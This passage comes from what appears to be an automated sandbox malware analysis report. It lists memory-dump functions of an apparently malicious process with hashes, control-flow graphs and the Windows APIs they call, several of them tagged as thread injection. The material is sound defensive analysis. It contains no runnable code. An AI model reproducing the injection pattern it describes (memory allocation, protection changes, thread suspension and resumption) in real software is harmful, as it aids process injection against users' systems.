                                                                                        Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 250f997dd2043885595aa07f0877d926764ed275398d9685807a533dbefdf616
                                                                                        • Instruction ID: b1fca14918d88fbf616c4a1b88067fc5a25c7a646c44cb22c698c5a940f5c5d7
                                                                                        • Opcode Fuzzy Hash: 250f997dd2043885595aa07f0877d926764ed275398d9685807a533dbefdf616
                                                                                        • Instruction Fuzzy Hash: 6DF01534508A4ECFCB94EF58C844AAA77A0FF18305F010165E42DC3265D7B4EAA4CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0835 Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e32ab13edfb55ee2ed64bfff5134ead64e4e9bd939a6b870fcbca5548bb4200b
                                                                                        • Instruction ID: 2a835837263c7312e4ecb6f0ced47c99f55cd8849ec86688ee60c36db4190eb0
                                                                                        • Opcode Fuzzy Hash: e32ab13edfb55ee2ed64bfff5134ead64e4e9bd939a6b870fcbca5548bb4200b
                                                                                        • Instruction Fuzzy Hash: 4AF03034A1950DEBDB74EFA8D921AEEB7A0FF04308F010175F41D87195CA34A655CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C172130 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c27b848947ec43522ae1085487992a0e8c959bf5be68c7496314e839d4e810f
                                                                                        • Instruction ID: f33dcfb59e462f7981c675cab465914186c03f74f5842b8ffbac2f5cf67bc7a6
                                                                                        • Opcode Fuzzy Hash: 7c27b848947ec43522ae1085487992a0e8c959bf5be68c7496314e839d4e810f
                                                                                        • Instruction Fuzzy Hash: 23E04F3050650ECFDB54EF54D9412EA77A0FF58304F014525E41DC3195DA74A664CBC1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA8FF0 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fb14195e00888b3146fecc3e2170b3f86ca9ccf97a290cfb67f59280aecc0d6
                                                                                        • Instruction ID: 27e53e2085724a0161e10a8937e9dd947e53ffb2c7f59e975b0e1239aadb3f0f
                                                                                        • Opcode Fuzzy Hash: 3fb14195e00888b3146fecc3e2170b3f86ca9ccf97a290cfb67f59280aecc0d6
                                                                                        • Instruction Fuzzy Hash: F3E05270E0962D8EEBB0DF5488A87A9B7F1EB15304F1151E6D00DA21A0CEB82BC0DF11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C1772E3 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 05f4b742874c58cae17708e6eb230f0e1628adfeb8f0dfcd482d1cc805bd7781
                                                                                        • Instruction ID: e323e5ae9af81a3f0bb1935a8748fa76055ed9d5619ac1b3f82633d5f17fb46f
                                                                                        • Opcode Fuzzy Hash: 05f4b742874c58cae17708e6eb230f0e1628adfeb8f0dfcd482d1cc805bd7781
                                                                                        • Instruction Fuzzy Hash: D4D0C922F1C80B97E57A92E8883457C10E1AF68381FB44535E42EE32C1CC6DB882228D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00007FFD9BC4A75D Relevance: .1, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c62ed30f388596b2a76af928336bdb9dc9505f0f6ac063da27cadaa35c0e4818
                                                                                        • Instruction ID: 00742d083d66521a3e6a2d5b9379794196d646541e2ed30426fad362e91f9fa5
                                                                                        • Opcode Fuzzy Hash: c62ed30f388596b2a76af928336bdb9dc9505f0f6ac063da27cadaa35c0e4818
                                                                                        • Instruction Fuzzy Hash: 8D31F670E08A1D8FCF94DF98D491AEDBBF1FB69300F20516AE019E3291D635AA41CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.7%
                                                                                        Dynamic/Decrypted Code Coverage:83.3%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:18
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 53801 7ffd9bc4c1bd 53802 7ffd9bc4c1cb SuspendThread 53801->53802 53804 7ffd9bc4c2a4 53802->53804 53805 7ffd9bc4d960 53806 7ffd9bc4d99b ResumeThread 53805->53806 53808 7ffd9bc4da74 53806->53808 53809 7ffd9bc4dac9 53810 7ffd9bc4dad7 FindCloseChangeNotification 53809->53810 53812 7ffd9bc4dbb4 53810->53812 53797 7ffd9bab316d 53798 7ffd9bab318f VirtualAlloc 53797->53798 53800 7ffd9bab32a5 53798->53800 53793 7ffd9bab177e 53794 7ffd9bab178d VirtualProtect 53793->53794 53796 7ffd9bab18cd 53794->53796 53789 7ffd9bc4f7e5 53790 7ffd9bc4f7ff GetFileAttributesW 53789->53790 53792 7ffd9bc4f8c5 53790->53792

                                                                                        Executed Functions

                                                                                        Function 00007FFD9BABAE1D Relevance: 4.5, Strings: 2, Instructions: 2035COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ffd9babae1d-7ffd9babaebf 5 7ffd9babaecd-7ffd9babaedc 0->5 6 7ffd9babaec1 0->6 7 7ffd9babaede 5->7 8 7ffd9babaee3-7ffd9babaeec 5->8 6->5 7->8 9 7ffd9babaf19-7ffd9babb1ed 8->9 10 7ffd9babaeee-7ffd9babaefd 8->10 113 7ffd9babb23c-7ffd9babb244 9->113 114 7ffd9babb219-7ffd9babb227 9->114 11 7ffd9babaeff 10->11 12 7ffd9babaf04-7ffd9babc885 call 7ffd9babdaa6 10->12 11->12 19 7ffd9babc890-7ffd9babc959 12->19 35 7ffd9babca66-7ffd9babcabe 19->35 36 7ffd9babc95f-7ffd9babc976 19->36 51 7ffd9babcc55-7ffd9babce65 35->51 52 7ffd9babcac4-7ffd9babcb0f 35->52 40 7ffd9babc978-7ffd9babc9c4 36->40 41 7ffd9babc9c5 36->41 40->41 44 7ffd9babc9c6-7ffd9babca5d 40->44 41->44 44->35 83 7ffd9babca5f 44->83 118 7ffd9babcffa-7ffd9babd007 51->118 62 7ffd9babcc3c-7ffd9babcc49 52->62 65 7ffd9babcc4f-7ffd9babcc50 62->65 66 7ffd9babcb14-7ffd9babcb22 62->66 70 7ffd9babd00d-7ffd9babd06c 65->70 68 7ffd9babcb29-7ffd9babcba9 66->68 69 7ffd9babcb24 66->69 89 7ffd9babcbab 68->89 90 7ffd9babcbb0-7ffd9babcc2a 68->90 69->68 88 7ffd9babd334-7ffd9babd361 70->88 83->35 98 7ffd9babd367-7ffd9babd38b call 7ffd9babdb09 88->98 99 7ffd9babd071-7ffd9babd331 88->99 89->90 127 7ffd9babcc2c-7ffd9babcc31 90->127 128 7ffd9babcc34-7ffd9babcc39 90->128 121 7ffd9babd38d 98->121 122 7ffd9babd394-7ffd9babd3c8 98->122 99->88 115 7ffd9babb246-7ffd9babbb27 113->115 116 7ffd9babb245 113->116 119 7ffd9babb229 114->119 120 7ffd9babb22e-7ffd9babb237 114->120 305 7ffd9babbb36-7ffd9babbb42 115->305 306 7ffd9babbb29-7ffd9babbb31 115->306 116->115 118->70 123 7ffd9babce6a-7ffd9babcf1f 118->123 119->120 120->113 121->122 131 7ffd9babd3e8-7ffd9babd3fe 122->131 132 7ffd9babd3ca-7ffd9babd3d7 122->132 174 7ffd9babcf8f-7ffd9babcfe7 123->174 175 7ffd9babcf21-7ffd9babcf49 123->175 127->128 128->62 139 7ffd9babd468-7ffd9babd4aa 131->139 140 7ffd9babd400-7ffd9babd405 131->140 134 7ffd9babd3d9 132->134 135 7ffd9babd3de-7ffd9babd3e6 132->135 134->135 135->131 159 7ffd9babd4b5-7ffd9babd509 139->159 143 7ffd9babd40b-7ffd9babd4aa 140->143 144 7ffd9babd5c4-7ffd9babd5c8 140->144 143->159 145 7ffd9babd8d7-7ffd9babd92f 144->145 146 7ffd9babd5ce-7ffd9babd5d7 144->146 171 7ffd9babda97-7ffd9babdaa5 145->171 172 7ffd9babd935-7ffd9babd9ca 145->172 151 7ffd9babd5d9-7ffd9babd5de 146->151 152 7ffd9babd5e1-7ffd9babd5ea 146->152 151->152 157 7ffd9babd8c1-7ffd9babd8d1 152->157 157->145 160 7ffd9babd5ef-7ffd9babd6a7 157->160 159->144 186 7ffd9babd50f-7ffd9babd51b 159->186 204 7ffd9babd6ad-7ffd9babd70d 160->204 205 7ffd9babd8b3-7ffd9babd8bb 160->205 172->171 210 7ffd9babd9d0-7ffd9babd9e1 172->210 193 7ffd9babcff2-7ffd9babcff7 174->193 176 7ffd9babcf4b 175->176 177 7ffd9babcf50-7ffd9babcf8d 175->177 176->177 177->193 186->144 190 7ffd9babd521-7ffd9babd5b9 186->190 190->144 193->118 220 7ffd9babd70f 204->220 221 7ffd9babd714-7ffd9babd71d 204->221 205->157 214 7ffd9babd9e8-7ffd9babda95 210->214 215 7ffd9babd9e3 210->215 214->171 215->214 220->221 224 7ffd9babd88c-7ffd9babd89a 221->224 225 7ffd9babd723-7ffd9babd77b 221->225 227 7ffd9babd89c 224->227 228 7ffd9babd8a1-7ffd9babd8a9 224->228 238 7ffd9babd807-7ffd9babd835 225->238 239 7ffd9babd781-7ffd9babd7ad 225->239 227->228 232 7ffd9babd8ab-7ffd9babd8b0 228->232 232->205 238->224 241 7ffd9babd7af 239->241 242 7ffd9babd7b4-7ffd9babd802 239->242 241->242 242->232 307 7ffd9babbee9-7ffd9babbf0b 305->307 306->307 307->114 309 7ffd9babbf11-7ffd9babbf53 307->309 313 7ffd9babc010-7ffd9babc016 309->313 314 7ffd9babbf58-7ffd9babbfb5 313->314 315 7ffd9babc01c-7ffd9babc05e 313->315 323 7ffd9babbfb7-7ffd9babbfbb 314->323 324 7ffd9babbfe2-7ffd9babc00d 314->324 322 7ffd9babc2ac-7ffd9babc2b2 315->322 326 7ffd9babc2b8-7ffd9babc3f7 322->326 327 7ffd9babc063-7ffd9babc1ab 322->327 323->324 325 7ffd9babbfbd-7ffd9babbfdf 323->325 324->313 325->324 343 7ffd9babc857-7ffd9babc85d 326->343 357 7ffd9babc23d-7ffd9babc241 327->357 358 7ffd9babc1b1-7ffd9babc23b 327->358 344 7ffd9babc3fc-7ffd9babc49a 343->344 345 7ffd9babc863-7ffd9babc88f call 7ffd9babdaa6 343->345 364 7ffd9babc49c-7ffd9babc4bf 344->364 365 7ffd9babc4ca-7ffd9babc4d9 344->365 345->19 359 7ffd9babc277-7ffd9babc28a 357->359 360 7ffd9babc243-7ffd9babc275 357->360 369 7ffd9babc28b-7ffd9babc2a9 358->369 359->369 360->369 364->365 370 7ffd9babc4db 365->370 371 7ffd9babc4e0-7ffd9babc4ef 365->371 369->322 370->371 372 7ffd9babc504-7ffd9babc51f 371->372 373 7ffd9babc4f1-7ffd9babc4ff 371->373 377 7ffd9babc53f-7ffd9babc82b 372->377 378 7ffd9babc521-7ffd9babc53b 372->378 376 7ffd9babc836-7ffd9babc854 373->376 376->343 377->376 378->377
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _$mX_H
                                                                                        • API String ID: 0-2526825130
                                                                                        • Opcode ID: f6cdf2afb327415a40768437da99f4fc72e94502bf8fb5b9aeaa3af1528c7b35
                                                                                        • Instruction ID: 4e263f967199276b6e7b9e57c82f89dc2508acab28b3700c5f2d22e582cef92c
                                                                                        • Opcode Fuzzy Hash: f6cdf2afb327415a40768437da99f4fc72e94502bf8fb5b9aeaa3af1528c7b35
                                                                                        • Instruction Fuzzy Hash: 71030E70E0992D8FEBA8DB58C8A5BA8B7B1FF58310F1441E9D05DD7292DA746E81CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAAECB9 Relevance: 3.8, Strings: 2, Instructions: 1297COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baad000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7N_H$|qZ
                                                                                        • API String ID: 0-2757564041
                                                                                        • Opcode ID: c77854470256672357ab42a2d1fa7287e4d6b20f12cb6f37b3ff676e2c44e9eb
                                                                                        • Instruction ID: c117a64434f8177c1ec660454f5908bfc90cd191ee978bb87577f89ef8bca15a
                                                                                        • Opcode Fuzzy Hash: c77854470256672357ab42a2d1fa7287e4d6b20f12cb6f37b3ff676e2c44e9eb
                                                                                        • Instruction Fuzzy Hash: 3DB2C570E0961D8FDBA8DB58C8A5AACB7B2FF58304F1041A9D00DE7295DB75AE81CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BABAE5A Relevance: .7, Instructions: 735COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baba000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce5c60e28af74623ed1fd84a927aedce8b187db04775f664c6bf89385df82851
                                                                                        • Instruction ID: bbf50d44f398eb4b7fbc6605e484f91e1629c3a512e81693304203d540ba44cc
                                                                                        • Opcode Fuzzy Hash: ce5c60e28af74623ed1fd84a927aedce8b187db04775f664c6bf89385df82851
                                                                                        • Instruction Fuzzy Hash: 44522370A0992D8FEFA8DB58C895BA9B7B1FF54300F1442E9D05DD3296DE356A81CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0DA7 Relevance: .3, Instructions: 291COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9baa0000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccec413865978a5fe07535bc2874d2b152e1410d5561d7869b5ab6e4b7d7ee97
                                                                                        • Instruction ID: 47af69c29257b92f46e95e10fadef0adeb451dbd330093dfce2bfb17e9ea5b29
                                                                                        • Opcode Fuzzy Hash: ccec413865978a5fe07535bc2874d2b152e1410d5561d7869b5ab6e4b7d7ee97
                                                                                        • Instruction Fuzzy Hash: EBA1CDB1A1994D8FE7A9DF68C8657AD7BE1EF99310F00017ED00DD72D6CAB82805C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C29BBE4 Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2937457782.00007FFD9C290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C290000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9c290000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 083e7aa17ff852b727e99a8e9f255da9c75b5039b8994616d4e779efdcec339c
                                                                                        • Instruction ID: 6912469278bfe71fef8226f856f9aff2db89d7d7719de24e4f5b64af8a771f2f
                                                                                        • Opcode Fuzzy Hash: 083e7aa17ff852b727e99a8e9f255da9c75b5039b8994616d4e779efdcec339c
                                                                                        • Instruction Fuzzy Hash: 35517CB180E7C98FC7539BB488755913FF1AF13204B0A48DBC4C5CF5A3E668995AC762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC8BB68 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 593 7ffd9bc8bb68-7ffd9bc8bb80 595 7ffd9bc8bb88-7ffd9bc8bbb3 593->595 599 7ffd9bc8bbdc-7ffd9bc8bbe2 595->599 600 7ffd9bc8bbe9-7ffd9bc8bbef 599->600 601 7ffd9bc8bbb5-7ffd9bc8bbce 600->601 602 7ffd9bc8bbf1-7ffd9bc8bbf6 600->602 603 7ffd9bc8bcc5-7ffd9bc8bcd5 601->603 604 7ffd9bc8bbd4-7ffd9bc8bbd9 601->604 605 7ffd9bc8bbfc-7ffd9bc8bc31 602->605 606 7ffd9bc8bae3-7ffd9bc8bb28 602->606 612 7ffd9bc8bcd7 603->612 613 7ffd9bc8bcd8-7ffd9bc8bd26 603->613 604->599 606->600 610 7ffd9bc8bb2e-7ffd9bc8bb34 606->610 614 7ffd9bc8bae5-7ffd9bc8bcbd 610->614 615 7ffd9bc8bb36 610->615 612->613 614->603 618 7ffd9bc8bb5f-7ffd9bc8bb66 615->618 618->593 620 7ffd9bc8bb38-7ffd9bc8bb51 618->620 620->603 622 7ffd9bc8bb57-7ffd9bc8bb5c 620->622 622->618
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC88000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC88000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc88000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $i0_H
                                                                                        • API String ID: 0-2773416049
                                                                                        • Opcode ID: 32bd8a37c3d6413e6f708abaca74ae5ba5b14d42f18f0e7fea0112d5c3b9cfc7
                                                                                        • Instruction ID: 52be40522ba8a6ef24ffed9d634d82f981c0dbcc7b21e4dcf0d7be57c1f9f165
                                                                                        • Opcode Fuzzy Hash: 32bd8a37c3d6413e6f708abaca74ae5ba5b14d42f18f0e7fea0112d5c3b9cfc7
                                                                                        • Instruction Fuzzy Hash: 51517F71E0990E8FDB59DBE8C4A15FDB7B1EF58304F1141BAD01AE72A6CA396901CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAB177E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 911 7ffd9bab177e-7ffd9bab178b 912 7ffd9bab1796-7ffd9bab17a7 911->912 913 7ffd9bab178d-7ffd9bab1795 911->913 914 7ffd9bab17a9-7ffd9bab17b1 912->914 915 7ffd9bab17b2-7ffd9bab18cb VirtualProtect 912->915 913->912 914->915 919 7ffd9bab18cd 915->919 920 7ffd9bab18d3-7ffd9bab1923 915->920 919->920
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2923709051.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab1000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 283d7c9b53ffa1af5ee343f31b438050f8e22a6770180aceeef6d08cd64fa8ec
                                                                                        • Instruction ID: 5cb2afb80061cb3d74f8c451243014d405b652f6f6e86adf92cb0f4b1e7a5fe0
                                                                                        • Opcode Fuzzy Hash: 283d7c9b53ffa1af5ee343f31b438050f8e22a6770180aceeef6d08cd64fa8ec
                                                                                        • Instruction Fuzzy Hash: 4A515830D0964D8FDB54DFA8C885AE9BBF1FB6A310F1042AAD449E3251DB74A885CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4D960 Relevance: 1.7, APIs: 1, Instructions: 161threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 923 7ffd9bc4d960-7ffd9bc4d999 924 7ffd9bc4d99b 923->924 925 7ffd9bc4d99c-7ffd9bc4da72 ResumeThread 923->925 924->925 929 7ffd9bc4da74 925->929 930 7ffd9bc4da7a-7ffd9bc4dac4 925->930 929->930
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction ID: 8953c6acf4c6b5c657014f712f050e19992a39b971c0d023e57ef1e5f26aea37
                                                                                        • Opcode Fuzzy Hash: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction Fuzzy Hash: 06517A7090C78C8FDB59EFA8D894BE9BBF0EF56310F1441ABD049DB292DA749946CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4DAC9 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1025 7ffd9bc4dac9-7ffd9bc4dad5 1026 7ffd9bc4dae0-7ffd9bc4dae9 1025->1026 1027 7ffd9bc4dad7-7ffd9bc4dada 1025->1027 1028 7ffd9bc4dadc-7ffd9bc4dadf 1026->1028 1029 7ffd9bc4daeb-7ffd9bc4dbb2 FindCloseChangeNotification 1026->1029 1027->1028 1028->1026 1033 7ffd9bc4dbb4 1029->1033 1034 7ffd9bc4dbba-7ffd9bc4dc0e 1029->1034 1033->1034
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction ID: f4d0ee3fc29203a6211fdc554c692196c7f81efa6443b278c31774e8c7c0c3a6
                                                                                        • Opcode Fuzzy Hash: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction Fuzzy Hash: 8B415B30E0865C8FDB58DFA8D895BEDBBF0FF5A310F1041AAD049D7292DA74A985CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4C1BD Relevance: 1.6, APIs: 1, Instructions: 142threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1037 7ffd9bc4c1bd-7ffd9bc4c1c9 1038 7ffd9bc4c1d4-7ffd9bc4c2a2 SuspendThread 1037->1038 1039 7ffd9bc4c1cb-7ffd9bc4c1d3 1037->1039 1043 7ffd9bc4c2a4 1038->1043 1044 7ffd9bc4c2aa-7ffd9bc4c2f4 1038->1044 1039->1038 1043->1044
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: SuspendThread
                                                                                        • String ID:
                                                                                        • API String ID: 3178671153-0
                                                                                        • Opcode ID: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction ID: 6e5fd9f0944486eee5cdb762805af6cfe4d60633fc1fbfc8cb599d84a2e5bdac
                                                                                        • Opcode Fuzzy Hash: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction Fuzzy Hash: 86414970E0864C8FDB98DFA8C895AEDBBF0FF5A311F10416AD449E7292DA71A945CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4F7E5 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1047 7ffd9bc4f7e5-7ffd9bc4f8c3 GetFileAttributesW 1051 7ffd9bc4f8cb-7ffd9bc4f909 1047->1051 1052 7ffd9bc4f8c5 1047->1052 1052->1051
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2927252671.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bc40000_qvQdgMbCgPRxtGlzSvteAOftUbVX.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
